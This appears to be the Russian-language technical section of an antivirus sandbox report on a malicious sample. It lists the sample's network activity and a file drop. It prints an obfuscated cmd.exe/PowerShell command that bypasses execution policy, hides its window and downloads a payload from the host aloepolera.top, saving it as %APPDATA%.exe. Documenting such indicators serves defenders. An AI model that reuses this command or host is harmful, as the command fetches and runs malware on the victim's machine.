Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWERSHe^lL.E^xE ^-e^XEcu^tIoNpo^l^icY^ ^b^yp^Ass ^-NoPr^of^ile ^-winD^o^ws^tYlE H^i^dden ^(New^-^oB^jEcT^ ^S^YST^e^m.ne^T^.^W^e^b^cl^i^eN^T).^DowN^lO^adFi^lE(^'http://aloepol...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "PoWERSHe^lL.E^xE ^-e^XEcu^tIoNpo^l^icY^ ^b^yp^Ass ^-NoPr^of^ile ^-winD^o^ws^tYlE H^i^dden ^(New^-^oB^jEcT^ ^S^YST^e^m.ne^T^.^W^e^b^cl^i^eN^T).^DowN^lO^adFi^lE(^'http://aloepol...' (со скрытым окном)